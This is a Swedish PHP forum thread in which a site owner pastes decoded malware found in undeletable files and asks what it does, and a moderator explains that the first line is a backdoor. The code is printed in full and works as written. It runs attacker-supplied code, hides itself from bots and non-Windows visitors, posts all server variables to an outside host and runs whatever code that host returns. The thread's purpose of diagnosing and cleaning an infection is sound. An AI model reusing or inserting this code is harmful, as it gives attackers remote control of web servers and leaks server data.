base64_decode malware?

PHPportalen Forum Index » PHP
Lägg ett bokmärke på hela tråden
Skapa nytt inlägg   Svara på inlägget
Visa föregående ämne :: Visa nästa ämne  
Startad av: Meddelande
marcusgarden



Medlem i: 3132 dagar

Status: Offline



#742253
Inlägg Skrivet: 2018-08-07 18:13      Ämne: base64_decode malware? Citera

Hej!

Håller på att hjälpa en kille med en förmodad infekterad sida:/

Har försökt radera ALLA filer på servern men vissa filer stannar envist kvar:/

ALLA filer som INTE går att radera (förmodar att hackaren har ändrat filrättigheterna(?)) har kod instoppat i base64_decode-taggar (har kört strängen i en docoder online), se kod nedan.

Vad gör egentligen koden?
Hur får jag bort allt?
Annat att tänka på?
Kan jag chmoda ALLA filer på något sätt så att jag kan radera dem? När jag försöker ändra chmod på filerna på servern via FTP så kan jag inte göra det:/

Tack på förhand!

KOD:
1:
if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") { eval(base64_decode($_POST["cookies_p"])); }
2:
if (strpos($_SERVER['REQUEST_URI'], "post_render" ) !== false) { $patchedfv = "GHKASMVG"; }
3:
if( isset( $_REQUEST['fdgdfgvv'] ) ) { if(md5($_REQUEST['fdgdfgvv']) === "93ad003d7fc57aae938ba483a65ddf6d") { $patchedfv = "SDFDFSDF"; } }
4:
 
5:
if($patchedfv === "GHKASMVG" ) { @ob_end_clean();  die;  }
6:
 
7:
if (strpos($_SERVER["HTTP_USER_AGENT"], "Win" ) === false) { $kjdke_c = 1; }
8:
error_reporting(0);
9:
if(!$kjdke_c) { global $kjdke_c; $kjdke_c = 1;
10:
global $include_test; $include_test = 1;
11:
$bkljg=$_SERVER["HTTP_USER_AGENT"];
12:
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS", "WordPress");
13:
if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['condtions'])  or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1")  or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )))
14:
{}
15:
else
16:
{
17:
foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
18:
$context_jhkb = stream_context_create(
19:
array('http'=>array(
20:
                        'timeout' => '15',
21:
                        'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
22:
                        'method' => 'POST',
23:
                        'content' => "REM_REM='1'".$data_nfdh
24:
)));
25:
$vkfu=file_get_contents("http://nortservis.net/session.php?id", false ,$context_jhkb);
26:
if($vkfu) { @eval($vkfu); } else {ob_start();  if(!@headers_sent()) { @setcookie("condtions","2",time()+172800); } else { echo "<script>document.cookie='condtions=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
27:
}
28:
 
29:
}
 
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
harald_b
Moderator



Medlem i: 4593 dagar
Från: Tavesta
Status: Offline



#742257
Inlägg Skrivet: 2018-08-08 13:23      Ämne: Citera

Första raden ser ut att vara en bakdörr som gör att angriparen kan köra vilken php-kod han vill på din server.

Anledningen till att de inte går att radera kan också vara att angriparen har flera bakdörrar, och lägger tillbaka filerna fort som ögat.

Men om det är chmod som är problemet så borde du kunna köra ett script som chmod-ar alla filer så du har rätt att radera dem. Det borde i så fall rimligtvis vara så angriparen har gjort i så fall.
 

_________________
R.r - Ett fritt affärssystem
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
Visa tidigare inlägg:   
Skapa nytt inlägg   Svara på inlägget
PHPportalen Forum Index » PHP
Hoppa till:  
Du kan inte skapa nya inlägg i det här forumet
Du kan inte svara på inlägg i det här forumet
Du kan inte ändra dina inlägg i det här forumet
Du kan inte ta bort dina inlägg i det här forumet
Du kan inte rösta i det här forumet
Du kan inte bifoga filer i detta forum
Du kan inte ladda ner filer från detta forum
Kontakta oss på adressen: info@phpportalen.net
Webbplatsen bygger i grunden på phpBB © 2001, 2002 phpBB Group

Modifieringar har senare gjorts i systemet av PHPportalen
Sid och logotypdesign skapad av Daren Jularic